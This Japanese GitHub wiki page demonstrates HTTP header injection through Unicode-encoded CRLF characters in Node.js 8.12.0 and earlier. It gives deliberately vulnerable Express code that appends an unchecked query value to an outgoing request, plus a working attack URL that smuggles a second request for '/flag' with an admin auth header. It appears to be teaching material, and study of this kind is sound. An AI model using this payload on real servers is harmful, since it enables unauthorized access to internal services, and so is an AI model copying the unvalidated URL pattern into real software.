HTTPヘッダインジェクション 03 - yujitounai/helloworld GitHub Wiki
HTTPヘッダインジェクション/HTTP response header injection
Unicode文字列でのCRLFインジェクション
%C4%A0 がスペース
%C4%8D%C4%8A が改行
脆弱なソースコード (modejs 8.12.0以下)
//node 8.12.0
var express = require('express');
var app = express();
var fs = require('fs');
var path = require('path');
var http = require('http');
app.get('/', function(req, res) {
var q = req.query.q;
var resp = "";
if (q) {
//ここに接続先を設定
var url = 'http://192.168.5.33:4444/?' + q
console.log(url)
try {
http.get(url, function(resp) {
resp.setEncoding('utf8');
resp.on('error', function(err) {
if (err.code === "ECONNRESET") {
console.log("Timeout occurs");
return;
}
});
resp.on('data', function(chunk) {
resps = chunk.toString();
res.send(resps);
}).on('error', (e) => {
res.send(e.message);});
});
} catch (error) {
console.log(error);
}
}
})
var server = app.listen(6003, function() {
var host = server.address().address
var port = server.address().port
console.log("Example app listening at http://%s:%s", host, port)
})
攻撃方法
http://localhost:6003/core?q=%C4%A0HTTP%2F1.1%C4%8D%C4%8AHost%3A%C4%A0127.0.0.1%C4%8D%C4%8A%C4%8D%C4%8AGET%C4%A0%2Fflag%C4%A0HTTP%2F1.1%C4%8D%C4%8AHost%3A%C4%A0127.0.0.1%C4%8D%C4%8Aadminauth%3A%C4%A0secretpassword%C4%8D%C4%8Apug%3A%C4%A0aaa%C4%8D%C4%8Adummy%3A%C4%A0
で
GET /? HTTP/1.1
Host: 127.0.0.1
GET /flag HTTP/1.1
Host: 127.0.0.1
adminauth: secretpassword
pug: aaa
みたいなヘッダが送信される